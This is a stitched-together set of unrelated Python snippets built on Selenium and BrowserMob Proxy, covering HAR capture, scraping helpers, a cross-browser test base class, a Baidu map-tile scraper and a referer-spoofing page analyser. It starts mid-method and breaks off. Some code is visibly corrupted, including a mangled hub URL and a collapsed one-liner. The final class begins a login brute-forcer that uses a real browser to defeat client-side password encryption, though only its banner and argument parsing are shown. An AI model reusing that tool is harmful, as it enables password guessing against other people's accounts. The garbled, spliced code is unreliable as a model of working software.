                new_window = self.driver.window_handles[1]
                self.driver.switch_to_window(new_window)
                self.driver.close()
                self.driver.switch_to_window(pages_window)
                run = False
            except selenium.common.exceptions.NoSuchElementException:
                print('Login NoSuchElementException.')
            except selenium.common.exceptions.TimeoutException:
                print('Login TimeoutException.')
            except selenium.common.exceptions.ElementNotInteractableException:
                print('Login ElementNotInteractableException.')

    def build_df(self):
        """Flatten the recorded HAR entries into the instance DataFrame.

        Nested dicts/lists are flattened via _add_to_dict with dotted keys;
        scalar values are kept as-is. One DataFrame row per HAR entry.
        """
        _ = list()
        for entry in self.proxy.har['log']['entries']:
            __ = dict()
            for k, v in entry.items():
                if type(v) == dict or type(v) == list:
                    self._add_to_dict(__, k + '.', v)
                else:
                    __[k] = v
            _.append(__)
        self.df = pd.DataFrame(_)

    def _add_to_dict(self, __, k, v):
        """Utility method for the build_df method.

        Recursively flattens `v` into dict `__` under dotted key prefix `k`.
        NOTE(review): the list branch unpacks each element as a (kk, vv)
        pair; HAR lists (e.g. headers) typically contain dicts, which would
        fail to unpack — confirm the expected element shape.
        """
        if type(v) == list:
            for kk, vv in v:
                if type(vv) == dict or type(vv) == list:
                    self._add_to_dict(__, k + kk + '.', vv)
                else:
                    __[k + kk] = vv
        else:
            for kk, vv in v.items():
                if type(vv) == dict or type(vv) == list:
                    self._add_to_dict(__, k + kk + '.', vv)
                else:
                    __[k + kk] = vv
def start_local_proxy():
    """Boot a local BrowserMob Proxy server and open a proxy on it.

    Returns:
        tuple: (proxy, server) — the proxy client for traffic capture and
        the running server instance (caller is responsible for stopping it).
    """
    mob_server = Server(PATH_TO_BROWSER_MOB_PROXY)
    mob_server.start()
    return mob_server.create_proxy(), mob_server
class browseWeb:
    """Interactive scraping helper: a BrowserMob-proxied Chrome session with
    element accessors, request classification (from the recorded HAR) and a
    small text-command dispatcher. Windows-specific paths throughout.
    """

    # Default headers for the requests.head() mime-type probes.
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
    }

    def __init__(self, root="C:/xampp/htdocs/webscrape/", folder=""):
        self.url = ""
        self.root = root + folder + "/"  # output folder for logs
        # Start browsermob proxy
        self.server = Server(
            r"C:\webdrivers\browsermob-proxy\bin\browsermob-proxy")
        self.server.start()
        self.proxy = self.server.create_proxy()
        # Setup Chrome webdriver - note: does not seem to work with headless On
        options = webdriver.ChromeOptions()
        options.binary_location = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
        options.add_argument(
            '--proxy-server=%s' % self.proxy.proxy
        )  # Setup proxy to point to our browsermob so that it can track requests
        self.w = webdriver.Chrome(r'C:/webdrivers/chromedriver.exe',
                                  chrome_options=options)
        self.proxy.new_har("Listener",
                           options={'captureHeaders': True})  # Request listener
        #self.proxy.new_har("Listener" )  # Request listener
        print("Browser and Server initialized...")

    #------------------------------------------------------
    # GETTERS
    #------------------------------------------------------
    def getCode(self):
        """Return the current page source HTML."""
        return self.w.page_source

    def getElement(self):
        """Return the last element selected via setElement."""
        return self.element

    def getElements(self):
        """Return the last element list selected via setElements."""
        return self.elements

    def getElementCode(self, element=None):
        """Return the outer HTML of `element` (or of the last selected one)."""
        if element:
            return element.get_attribute('outerHTML')
        else:
            return self.element.get_attribute('outerHTML')

    def getTypeParam(self, by):
        """Map a short locator keyword to the Selenium By constant (or None)."""
        byParam = None
        if by == "id":
            byParam = By.ID
        if by == "class":
            byParam = By.CLASS_NAME
        if by == "name":
            byParam = By.NAME
        if by == "tag":
            byParam = By.TAG_NAME
        if by == "text":
            byParam = By.PARTIAL_LINK_TEXT
        if by == "css":
            byParam = By.CSS_SELECTOR
        return byParam

    def getRequests(self):
        """Classify every recorded HAR request by mime type.

        Writes the raw HAR log to '<root>/logs/har.json', dedupes requests by
        query-stripped URL, resolves empty/plain mime types with a HEAD probe,
        and buckets the URLs into js/css/img/font/json/doc/binary/unknown
        with per-bucket counts under 'total'. Stores the result on
        self.request and returns it.
        """
        dataCollected = {}
        requestsList = {
            "js": [],
            "css": [],
            "img": [],
            "font": [],
            "json": [],
            "doc": [],
            "binary": [],
            "unknown": [],
            "total": {}
        }
        # Get list of All requests
        requestLog = self.proxy.har['log']["entries"]
        createFolder(self.root + "logs")
        writeFile(data=beauty(requestLog), file=self.root + "logs/har.json")
        print("\n[ ! ] HAR Stored! ")
        for entry in requestLog:
            if 'request' in entry.keys():
                # Getting referers
                referer = ""
                headersList = entry['request']['headers']
                for item in headersList:
                    if item["name"] == "Referer":
                        referer = item["value"]
                url = entry['request']['url']
                obj = {
                    "url": url,
                    "type": entry['response']['content']['mimeType'],
                    "size": entry['response']['bodySize'],
                    "method": entry['request']['method'],
                    "status": entry['response']['status'],
                    "referer": referer
                }
                urlNew = url
                if "?" in url:
                    urlNew = url.split("?")[0]  # remove ? parameters from url
                dataCollected[urlNew] = obj
        # Clasifing resquests
        for key in dataCollected:
            # NOTE(review): `type` shadows the builtin here.
            type = dataCollected[key]["type"]
            url = dataCollected[key]["url"]
            referer = dataCollected[key]["referer"]
            status = str(dataCollected[key]["status"])
            # if status is available (skip 204 No Content)
            if not "204" in status:
                # Catching mymeType of empty mimeTypes or plain mime
                if type == "" or "plain" in type or "None" in type:
                    try:
                        print("--> (" + status + " - " + type +
                              ")Getting mimeType -> " + url)
                        header = requests.head(url,
                                               allow_redirects=True,
                                               headers=self.headers)
                        type = str(header.headers.get('content-type'))
                        print("--> ( " + type + " )")
                    except requests.exceptions.Timeout as e:
                        print("Error Timeout: ", e)
                    except requests.exceptions.ConnectionError as e:
                        print("Error Connecting: ", e)
                    except requests.exceptions.TooManyRedirects as e:
                        print("Error, too many redirects", e)
                    except requests.exceptions.HTTPError as e:
                        print("Http Error", e)
                    except requests.exceptions.RequestException as e:
                        # catastrophic error. bail.
                        print(e)
                        sys.exit(1)
                # Bucket by mime-type substring.
                if "image" in type:
                    requestsList["img"].append([url, type])
                elif "css" in type:
                    requestsList["css"].append([url, type])
                elif "font" in type:
                    requestsList["font"].append([url, type])
                elif "javascript" in type:
                    requestsList["js"].append([url, type])
                elif "json" in type:
                    requestsList["json"].append([url, type])
                elif "html" in type or "plain" in type:
                    requestsList["doc"].append([url, type])
                elif "octet-stream" in type:
                    requestsList["binary"].append([url, type])
                else:
                    requestsList["unknown"].append([url, type])
        # Counting resquests
        # NOTE(review): "total" is itself a key of requestsList, so its dict
        # length is also counted into the grand total — confirm intent.
        total = 0
        for key in requestsList:
            subtotal = len(requestsList[key])
            requestsList["total"][key] = subtotal
            total = total + subtotal
        requestsList["total"]["total"] = total
        self.request = requestsList
        return requestsList

    #------------------------------------------------------
    # SETTERS
    #------------------------------------------------------
    def setUrl(self, url):
        """Set the URL used by the 'start' command."""
        self.url = url

    def setElement(self, by, name):
        """Select and store a single element by locator type + value."""
        byParam = self.getTypeParam(by)
        self.element = self.w.find_element(byParam, name)
        return self.element

    def setElements(self, by, name):
        """Select and store a list of elements by locator type + value."""
        byParam = self.getTypeParam(by)
        self.elements = self.w.find_elements(byParam, name)
        return self.elements

    #------------------------------------------------------
    # FUNCTIONS
    #------------------------------------------------------
    def browseURL(self, url):
        """Navigate to `url` with a 30s load timeout; on timeout, stop the
        page load via JS and continue."""
        print("--> Loading web -> " + url)
        t = time.time()
        self.w.implicitly_wait(30)
        self.w.set_page_load_timeout(30)
        try:
            self.w.get(url)
        except TimeoutException:
            print("Error loading something")
            print('Time consuming:', time.time() - t)
            self.w.execute_script("window.stop();")
        print("--> Loaded... ")

    #-------------------------------------------------------
    def click(self, selector=""):
        """Click the element at `selector`, or the stored element if empty."""
        if selector:
            self.w.find_element_by_css_selector(selector).click()
        else:
            self.element.click()

    def enter(self, selector=""):
        """Send ENTER to the element at `selector`, or the stored element."""
        if selector:
            self.w.find_element_by_css_selector(selector).send_keys(Keys.ENTER)
        else:
            self.element.send_keys(Keys.ENTER)

    def text(self, selector="", text=""):
        """Type `text` into the element at `selector`, or the stored element."""
        if selector:
            self.w.find_element_by_css_selector(selector).send_keys(text)
        else:
            self.element.send_keys(text)

    def exit(self):
        """Stop proxy + browser, then force-kill the java/chromedriver
        processes (Windows-specific)."""
        self.server.stop()
        print("Closed Proxy Server...")
        self.w.close()
        print("Closed Browser...")
        self.w.quit()
        print("Quited app...")
        # Killing java and webdriver process
        os.system("taskkill /f /im java.exe")
        os.system("taskkill /f /im chromedriver.exe")
        print("Process killed...")

    # -------------------------------------------------------
    def waitEnableItem(self, delay=10):
        """Wait up to `delay`s for the 'getData' button to become clickable,
        then click it; timeouts are only logged."""
        try:
            # wait for button to be enabled
            WebDriverWait(self.w, delay).until(
                EC.element_to_be_clickable((By.ID, 'getData')))
            button = self.w.find_element_by_id('getData')
            button.click()
        except TimeoutException:
            print('Loading took too much time!')
        else:
            #html = browser.page_source
            pass
        finally:
            #browser.quit()
            pass

    def waitLoadedItem(self, delay=10, cssSelector=""):
        """Wait up to `delay`s for `cssSelector` to appear; timeouts are only
        logged."""
        try:
            # wait for data to be loaded
            # e.g: cssSelector = '#dataTarget > div'
            WebDriverWait(self.w, delay).until(
                EC.presence_of_element_located((By.CSS_SELECTOR, cssSelector)))
        except TimeoutException:
            print('Loading took too much time!')
        else:
            #html = self.w.page_source
            pass
        finally:
            #browser.quit()
            pass

    # -------------------------------------------------------
    def command(self, data):
        """Dispatch a text command: 'start', 'getrequests', 'click <sel>',
        'getcode'. Numeric shortcuts '1'/'2' map through `library`."""
        library = {"1": "start", "2": "getrequests"}
        # getCode from library
        if data.isdigit():  # if the command is a number
            if data in library:  # if the number exist in the library
                data = library[data]
        if "start" in data:
            self.browseURL(self.url)
        elif "getrequests" in data:
            self.getRequests()
            print("-" * 30)
            printo(self.request)
            print("-" * 30)
        elif "click" in data:
            array = data.split(" ")
            if len(array) > 1:
                self.click(array[1])
        elif "getcode" in data:
            code = self.getCode()
            print(code)
class SeleniumTestCase(unittest.TestCase):
    """Base Selenium test case, configured entirely from environment vars.

    Optionally routes traffic through a BrowserMob proxy (USE_PROXY) and/or
    runs remotely on CrossBrowserTesting (CBT_FLAG). setUp builds the driver
    for the browser selected by TEST_BROWSER; tearDown closes everything and
    reports the score to CBT when enabled.
    """
    client = None  # the webdriver instance (set in setUp)
    server = None  # BrowserMob server (only when use_proxy)
    proxy = None   # BrowserMob proxy client (only when use_proxy)
    use_proxy = True if int(os.environ.get('USE_PROXY', 0)) else False
    visitor_site_url = os.environ.get('VISITOR_SITE_URL',
                                      'http://visitor.angieslist.com')
    legacy_url = os.environ.get('LEGACY_URL', 'http://qatools.angieslist.com')
    browser_clients = os.environ.get('BROWSER_CLIENTS', 'Chrome').split(',')
    test_browser = int(os.environ.get('TEST_BROWSER', 0))  # index into browser_clients
    test_client = os.environ.get('TEST_CLIENT', 'Mac OSX 10.10')
    browsermob_path = os.environ.get(
        'BROWSERMOB_PATH', './../browsermob-proxy/bin/browsermob-proxy')
    browsermob_port = int(os.environ.get('BROWSERMOB_PORT', '9090'))
    browsermob_host = os.environ.get('BROWSERMOB_HOST', '127.0.0.1')
    test_legacy_user = os.environ.get('LEGACY_USER', '')
    test_legacy_password = os.environ.get('LEGACY_PASSWORD', '')
    cbt_user = os.environ.get('CBT_USER', '')
    cbt_key = os.environ.get('CBT_KEY', '')
    cbt_flag = True if int(os.environ.get('CBT_FLAG', 1)) else False
    char_key = None  # last key captured by keypress()
    caps = {}        # desired capabilities, filled in setUp

    def setUp(self):
        """Start the proxy (optional), CBT API session (optional) and the
        browser selected by TEST_BROWSER."""
        method_name = self.browser_clients[self.test_browser]
        if self.use_proxy:
            self.server = Server(self.browsermob_path, {
                'host': self.browsermob_host,
                'port': self.browsermob_port
            })
            self.server.start()
            self.proxy = self.server.create_proxy()
        if self.cbt_flag:
            self.api_session = requests.Session()
            self.api_session.auth = (self.cbt_user, self.cbt_key)
            self.test_result = 'fail'  # flipped by tests; reported in tearDown
        self.caps['name'] = self.id() + ' ' + str(datetime.datetime.now())
        self.caps['build'] = '1.0'
        # caps['browserName'] = 'Safari'
        # caps['version'] = '8'
        self.caps['browserName'] = method_name
        self.caps['platform'] = self.test_client
        self.caps['screenResolution'] = '1366x768'
        self.caps['record_video'] = 'true'
        self.caps['record_network'] = 'true'
        self.caps['loggingPrefs'] = {'performance': 'INFO'}
        try:
            # e.g. webdriver.Chrome / webdriver.Firefox
            client_method = getattr(webdriver, method_name)
        except AttributeError:
            raise NotImplementedError(
                "Class `{}` does not implement `{}`".format(
                    webdriver.__class__.__name__, method_name))
        try:
            d = getattr(DesiredCapabilities, method_name.upper())
            d['loggingPrefs'] = {
                'browser': 'ALL',
                'driver': 'ALL',
                'performance': 'ALL'
            }
            if method_name == 'Chrome':
                ch_profile = webdriver.ChromeOptions()
                ch_profile.perfLoggingPrefs = {
                    'enableNetwork': True,
                    'traceCategories': 'performance, devtools.network'
                }
                ch_profile.add_argument('incognito')
                ch_profile.add_argument('disable-extensions')
                ch_profile.add_argument('auto-open-devtools-for-tabs')
                ch_profile.add_argument('disable-browser-side-navigation')
                if self.use_proxy:
                    ch_profile.add_argument(
                        '--proxy-server=http://%s' %
                        self.proxy.selenium_proxy().httpProxy)
                if self.cbt_flag:
                    # Remote session on CrossBrowserTesting.
                    browser = webdriver.Remote(
                        desired_capabilities=self.caps,
                        command_executor=
                        "http://%s:%[email protected]:80/wd/hub" %
                        (self.cbt_user, self.cbt_key))
                    browser.implicitly_wait(20)
                else:
                    browser = client_method(desired_capabilities=d,
                                            chrome_options=ch_profile)
            elif method_name == 'Firefox':
                fp = webdriver.FirefoxProfile()
                if self.use_proxy:
                    fp.set_proxy(self.proxy.selenium_proxy())
                if self.cbt_flag:
                    browser = webdriver.Remote(
                        desired_capabilities=self.caps,
                        command_executor=
                        "http://%s:%[email protected]:80/wd/hub" %
                        (self.cbt_user, self.cbt_key))
                    browser.implicitly_wait(20)
                else:
                    browser = client_method(capabilities=d, firefox_profile=fp)
            else:
                browser = client_method()
            browser.set_window_size(2000, 1400)
            self.client = browser
        # NOTE(review): bare except hides the real failure; also `skiptest`
        # is presumably unittest's `skipTest` (typo would raise AttributeError).
        except:
            print('Web browser not available')
            self.skiptest('Browser not available')
        time.sleep(1)

    def tearDown(self):
        """Close the browser and proxy; report the score to CBT if enabled."""
        if self.client:
            self.client.close()
        if self.server:
            self.server.stop()
        if self.cbt_flag:
            self.client.quit()
            self.api_session.put(
                'https://crossbrowsertesting.com/api/v3/selenium/' +
                self.client.session_id,
                data={
                    'action': 'set_score',
                    'score': self.test_result
                })

    def isElementPresent(self, cssSelector):
        """Return True if a CSS selector matches any element, else False."""
        try:
            err_element = self.client.find_element_by_css_selector(cssSelector)
            return True
        except NoSuchElementException:
            return False
        return False

    def prompt_with_timeout(self, prompt, time_limit):
        """Show `prompt` and wait up to `time_limit` seconds for a keypress.

        A background thread captures one raw key into self.char_key; returns
        the key if pressed in time, otherwise None. Restores the terminal
        settings on both paths.
        """
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        myThread = _thread.start_new_thread(self.keypress, ())
        print(prompt)
        for i in range(0, time_limit):
            self.char_key = None
            sleep(1)
            if self.char_key is not None:
                termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
                char = self.char_key
                self.char_key = None
                try:
                    _thread.exit()
                except SystemExit:
                    pass
                return char
        termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        print("Continuing...")
        self.char_key = None
        return None

    def getch(self):
        """Read a single raw character from stdin (terminal set to raw mode
        for the duration, then restored)."""
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch

    def keypress(self):
        """Thread target: capture one keypress into self.char_key."""
        self.char_key = self.getch()

    # Helper method to use after an event triggers a new page load
    # @param old_page - client.find_element_by_tag_name('html') grabbed BEFORE new page call
    # @param timeout - int seconds
    @contextmanager
    def wait_for_new_page_load(self, old_page, timeout=30):
        yield
        WebDriverWait(self.client, timeout).until(staleness_of(old_page))
class HarProfiler:
    """Context manager that profiles page loads into HAR files.

    On enter it starts an (optional) virtual display and a BrowserMob proxy
    server; `load_page` then drives a proxied Firefox through a cold and an
    optional cached load of the URL, saving one HAR file per load into
    `har_dir`. File names are built from a slugified URL plus a timestamp.
    """

    def __init__(self, config, url):
        """Derive labels and HAR file names from `config` and the target URL.

        Args:
            config: dict with keys 'har_dir', 'browsermob_dir',
                'label_prefix', 'virtual_display',
                'virtual_display_size_x', 'virtual_display_size_y'.
            url: The URL to profile (slugified into the record label).
        """
        self.har_dir = config['har_dir']
        self.browsermob_dir = config['browsermob_dir']
        self.label_prefix = config['label_prefix'] or ''
        self.virtual_display = config['virtual_display']
        self.virtual_display_size_x = config['virtual_display_size_x']
        self.virtual_display_size_y = config['virtual_display_size_y']

        self.label = '{}{}'.format(self.label_prefix, self.slugify(url))
        self.cached_label = '{}-cached'.format(self.label)

        # Same timestamp for the pair so the two files sort together.
        epoch = time.time()
        self.har_name = '{}-{}.har'.format(self.label, epoch)
        self.cached_har_name = '{}-{}.har'.format(self.cached_label, epoch)

    def __enter__(self):
        log.info('starting virtual display')
        if self.virtual_display:
            self.display = Display(visible=0, size=(
                self.virtual_display_size_x,
                self.virtual_display_size_y
            ))
            self.display.start()
        log.info('starting browsermob proxy')
        self.server = Server('{}/bin/browsermob-proxy'.format(
            self.browsermob_dir)
        )
        self.server.start()
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        log.info('stopping browsermob proxy')
        self.server.stop()
        log.info('stopping virtual display')
        # BUG FIX: self.display only exists when virtual_display is enabled;
        # unconditionally stopping it raised AttributeError on exit.
        if self.virtual_display:
            self.display.stop()

    def _make_proxied_webdriver(self):
        """Return (driver, proxy): a Firefox routed through a fresh proxy."""
        proxy = self.server.create_proxy()
        profile = webdriver.FirefoxProfile()
        profile.set_proxy(proxy.selenium_proxy())
        driver = webdriver.Firefox(firefox_profile=profile)
        return (driver, proxy)

    def _save_har(self, har, cached=False):
        """Dump `har` as JSON into har_dir, creating the directory if needed."""
        if not os.path.isdir(self.har_dir):
            os.makedirs(self.har_dir)
        if not cached:
            har_name = self.har_name
        else:
            har_name = self.cached_har_name
        log.info('saving HAR file: {}'.format(har_name))
        with open(os.path.join(self.har_dir, har_name), 'w') as f:
            json.dump(har, f, indent=2, ensure_ascii=False)

    def load_page(self, url, run_cached=True):
        """Load `url` once cold (and once warm when `run_cached`), saving a
        HAR file for each load."""
        driver, proxy = self._make_proxied_webdriver()
        proxy.new_har(self.label)
        log.info('loading page: {}'.format(url))
        driver.get(url)
        self._save_har(proxy.har)
        if run_cached:
            proxy.new_har(self.cached_label)
            log.info('loading cached page: {}'.format(url))
            driver.get(url)
            self._save_har(proxy.har, cached=True)
        driver.quit()

    def slugify(self, text):
        """Lowercase `text` and join its alphanumeric runs with hyphens."""
        pattern = re.compile(r'[^a-z0-9]+')
        slug = '-'.join(word for word in pattern.split(text.lower()) if word)
        return slug
class Get_url:
    # Map-tile scraper: drives Chrome through BrowserMob proxy over a Baidu
    # map page, drags the viewport tile-by-tile with pyautogui, and later
    # extracts tile-request URLs from the recorded HAR.

    # Absolute paths to the BrowserMob launcher and chromedriver binaries.
    PROXY_PATH = path.abspath(
        r"D:\Anaconda3\browsermob-proxy-2.1.4\bin/browsermob-proxy.bat")
    CHROME_PATH = path.abspath(r"D:\Anaconda3\chromedriver.exe")
    # Chrome content pref: 1 = allow images to load.
    CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 1}

    def __init__(self, url):
        # Target page URL; navigated to later by open_web().
        self.url = url

    def open_web(self, win_size=(800, 800)):
        # Size the window, then navigate to the target URL.
        # NOTE(review): assumes initWeb() has already created self.driver.
        self.driver.set_window_size(*win_size)
        self.driver.get(self.url)

    def win_setting(self):
        # Click the map's zoom-in control six times (1 s apart) to reach
        # the desired scale before scraping starts.
        enlarge_element = self.driver.find_element_by_xpath(
            "//div[@class='BMap_smcbg in']")
        for i in range(6):
            time.sleep(1)
            enlarge_element.click()

    def initProxy(self):
        """
        step 4: initialize browsermobproxy.
        Network blocking rules (CSS and images — Chrome's own pref sometimes
        fails) can speed up page loads; create the new proxy address here.
        """
        self.server = Server(self.PROXY_PATH)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def initWeb(self):
        # Point Chrome at the freshly created proxy port, then open the
        # page and zoom the map in.
        chromeSettings = webdriver.ChromeOptions()
        chromeSettings.add_argument('--proxy-server={host}:{port}'.format(
            host="localhost", port=self.proxy.port))
        chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS)
        self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH,
                                       chrome_options=chromeSettings)
        self.open_web()
        self.win_setting()

    def move(self, x_offset, y_offset, mode_str):
        # Drag the map in 256-px steps with pyautogui so every tile of an
        # (x_offset, y_offset) rectangle passes through the viewport.
        # The screen coordinates below are hard-coded for this window size.
        def drag_left(n):
            # One drag per tile, pulling the map content leftward.
            for i in range(n):
                pag.moveTo(20, 150, 0.5)
                pag.dragTo(276, 150, 1)

        def drag_right(n):
            for i in range(n):
                pag.moveTo(276, 150, 0.5)
                pag.dragTo(20, 150, 1)

        def drag_down(n):
            for i in range(n):
                pag.moveTo(20, 406, 0.5)
                pag.dragTo(20, 150, 1)

        def drag_up(n):
            for i in range(n):
                pag.moveTo(20, 150, 0.5)
                pag.dragTo(20, 406, 1)

        # The four *_rect helpers sweep the rectangle boustrophedon-style:
        # alternate horizontal direction each row, stepping one row per pass.
        def up_left_rect(x_n, y_n):
            for down_n in range(y_n):
                if (down_n % 2) == 0:
                    drag_left(x_n)
                    print('向左移动')
                else:
                    drag_right(x_n)
                drag_up(1)

        def up_right_rect(x_n, y_n):
            for down_n in range(y_n):
                if (down_n % 2) == 0:
                    drag_right(x_n)
                    print('向右移动')
                else:
                    drag_left(x_n)
                drag_up(1)

        def down_left_rect(x_n, y_n):
            for down_n in range(y_n):
                if (down_n % 2) == 0:
                    drag_left(x_n)
                    print('向左移动')
                else:
                    drag_right(x_n)
                drag_down(1)

        def down_right_rect(x_n, y_n):
            for down_n in range(y_n):
                if (down_n % 2) == 0:
                    drag_right(x_n)
                    print('向右移动')
                else:
                    drag_left(x_n)
                drag_down(1)

        # Convert pixel offsets to 256-px tile counts.
        x_n = int(x_offset / 256)
        y_n = int(y_offset / 256)
        if mode_str == 'up_left':
            up_left_rect(x_n, y_n)
        elif mode_str == 'up_right':
            up_right_rect(x_n, y_n)
        elif mode_str == 'down_left':
            down_left_rect(x_n, y_n)
        else:
            down_right_rect(x_n, y_n)

    def start(self):
        """step 8: start-up order of the monitor."""
        try:
            self.initProxy()
            self.initWeb()
            print('初始化完成')
            self.proxy.new_har('monitor', options={'captureContent': True})
            time.sleep(2)
            next_step = 'down_right'
            while next_step in [
                    'up_left', 'up_right', 'down_left', 'down_right'
            ]:
                self.move(2560, 2560, next_step)
                # After each pass, re-centre the map at the collection
                # origin and reset the scale to 50 m before continuing.
                next_step = input(
                    '输入采集模式(up_left/up_right/down_left/down_right):')
        except Exception as err:
            print(err)

    def get_req_url(self, targetUrl):
        # Scan the recorded HAR for requests matching the *targetUrl* regex
        # and decode the x/y tile codes embedded in each URL's query string.
        # Returns a list of {'x_code', 'y_code', 'url'} dicts, or None when
        # no entries were captured.
        if self.proxy.har['log']['entries']:
            req_list = []
            for loop_record in self.proxy.har['log']['entries']:
                req_url = urllib.parse.unquote(loop_record["request"]['url'])
                try:
                    if re.fullmatch(targetUrl, req_url):
                        url_dict = {}
                        # Strip the obfuscation tokens around the coordinate
                        # pair, then split it into x and y codes.
                        p_str = req_url.split("=")[2].replace(
                            'E9FA;C92E98O5K?CDI8A', '').replace('3N5L?3K8:', '')
                        x_code, y_code = p_str.split(';EK9FJE2>C')
                        url_dict['x_code'] = x_code
                        url_dict['y_code'] = y_code
                        url_dict['url'] = req_url
                        req_list.append(url_dict)
                except Exception as err:
                    print(err)
                    continue
            return req_list

    def quit(self):
        """
        step 9: shutdown order of the monitor.
        Stopping the proxy server may fail; currently it is closed manually.
        If anyone has a proper fix, contributions are very welcome.
        """
        self.driver.close()
        self.driver.quit()
        try:
            self.proxy.close()
            self.server.process.terminate()
            self.server.process.wait()
            self.server.process.kill()
        except OSError:
            pass
from browsermobproxy import Server server = Server("/root/Desktop/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy") server.start() proxy = server.create_proxy() from selenium import webdriver profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har("google") driver.get("http://www.google.co.uk") test = proxy.har # returns a HAR JSON blob print test server.stop() driver.quit()
def run_webdriver(self, start_url, port, config, download_dir):
    """Drive a BrowserMob-proxied Firefox at *start_url* and capture a HAR.

    start_url    -- urlparse-style object; .hostname names the HAR.
    port         -- TCP port for the BrowserMob proxy instance.
    config       -- carries url / referer / useragent / firefoxprofile.
    download_dir -- directory Firefox saves downloads into.
    """
    global useragent
    global referer
    urllib3_logger = logging.getLogger('urllib3')
    urllib3_logger.setLevel(logging.DEBUG)
    logging.info("Starting WebRunner")
    firefox_profile = None
    server = None
    proxy = None
    har = None
    # BUG FIX: pre-bind so the except-branch cleanup cannot NameError when
    # WebDriver construction itself fails.
    webdriver = None
    # Fall back to a plausible Google-search referer when none configured.
    if config.referer:
        referer = config.referer
    else:
        referer = 'http://www.google.com/search?q={}+&oq={}&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb&gws_rd=cr'.format(
            config.url, config.url)
    if config.useragent:
        useragent = config.useragent
    else:
        useragent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:24.0) Gecko/20100101 Firefox/24.0'
    logging.debug("Running with UserAgent: {}".format(useragent))
    logging.debug("Running with Referer: {}".format(referer))
    logging.debug("Checking URL: {}".format(config.url))
    server = Server("lib/browsermob/bin/browsermob-proxy", {'port': port})
    server.start()
    proxy = server.create_proxy()
    proxy.headers({'User-Agent': useragent,
                   'Accept-Encoding': "",
                   'Connection': 'Close'})
    # JS interceptor: add the configured Referer header only when the
    # request does not already carry one.
    request_js = (
        'var referer = request.getProxyRequest().getField("Referer");'
        'addReferer(request);'
        'function addReferer(r){'
        'if (! referer ) {'
        'r.addRequestHeader("Referer","' + referer + '");'
        '}'
        'return;'
        '}')
    proxy.request_interceptor(request_js)
    if config.firefoxprofile:
        firefox_profile = FirefoxProfile(profile_directory=config.firefoxprofile)
    else:
        firefox_profile = FirefoxProfile()
    logging.debug("Using profile {}".format(firefox_profile.path))
    # Disable OCSP so the proxy's MITM certificates are not rejected, and
    # auto-save downloads into download_dir without prompting.
    firefox_profile.set_preference("security.OCSP.enabled", 0)
    firefox_profile.set_preference("browser.download.folderList", 2)
    firefox_profile.set_preference("browser.download.manager.showWhenStarting", False)
    firefox_profile.set_preference("browser.download.dir", download_dir)
    firefox_profile.set_preference("browser.helperApps.neverAsk.saveToDisk",
                                   "application/x-xpinstall;application/x-zip;application/x-zip-compressed;application/octet-stream;application/zip;application/pdf;application/msword;text/plain;application/octet")
    firefox_profile.set_preference("browser.helperApps.alwaysAsk.force", False)
    firefox_profile.set_preference("browser.download.manager.showWhenStarting", False)
    firefox_profile.set_preference("network.proxy.type", 1)
    firefox_profile.set_proxy(proxy.selenium_proxy())
    try:
        webdriver = WebDriver(firefox_profile)
        proxy.new_har(start_url.hostname,
                      options={"captureHeaders": "true",
                               "captureContent": "true",
                               "captureBinaryContent": "true"})
        self.analyse_page(webdriver, start_url)
        har = proxy.har
        logging.info("Stopping WebRunner")
        proxy.close()
        server.stop()
        webdriver.quit()
        har = Har(har)
    # BUG FIX: "except Exception, e" is py2-only syntax; "as e" works on
    # both interpreters. Cleanup is guarded so a half-initialized run does
    # not raise a second error while tearing down.
    except Exception as e:
        logging.error(e)
        if proxy is not None:
            proxy.close()
        if webdriver is not None:
            webdriver.quit()
        server.stop()
class Brower_scan():
    # Browser-driven login brute-forcer: drives a real (headless) Chrome
    # through BrowserMob proxy so the target site's own JS encryption is
    # applied to every payload, then matches captured responses back to
    # the attempted credentials. The whole scan runs from __init__.

    def __init__(self):
        self.response_result = []  # raw response bodies of matched requests
        self.result = {}           # password line -> response body text
        self.args = self.init__args()
        self.init_browsermobproxy()
        self.init_chrome()
        self.init_dict_list()
        self.result_handing()
        self.end_env()

    def init__args(self):
        # Print the banner/usage notes, then parse and return CLI options.
        # NOTE(review): the banner's original line breaks were lost in this
        # copy; the string content is preserved as-is.
        print(""" ____. ____________________ __ | |/ _____/\ _____/____ _______| | ___ | |\_____ \ | __) \__ \\\\_ __| | / / | | ____| | | | / \ | | | |/ / /\__| |/ | | | / __ \| | | | \ \________/_______ / |__ / (____ /__| |__|_ _\ \/ \/ \/ \/ Author:0xAXSDD By Gamma安全实验室 version:1.0 explain:这是一款用户绕过前端js加密进行密码爆破的工具,你无需在意js加密的细节,只需要输入你想要爆破url,已经username输入框的classname,password输入框的classname,点击登录框classname,爆破用户名,密码字典等就可,暂时不支持带验证码校验的爆破 例子: 只爆破密码:python JsFak.py -u url -user admin -Pd password.txt -cu user_classname -cp pass_classname -l login_classname 爆破密码和用户:python main.py -ud username.txt -pd password.txt -cu user_classname -cp user_classname -l user_classname -u url 详情功能参考 -h 注意:如果遇到的classname 带空格 请用""括起来 Sever服务默认的是8080端口,如果需要修改,直接点Sever类修改,并指定参数-p """)
        parser = argparse.ArgumentParser(
            description=
            'Use your browser to automatically call JS encryption to encrypt your payload'
        )
        parser.add_argument("-u", "--url", metavar='url', required=True,
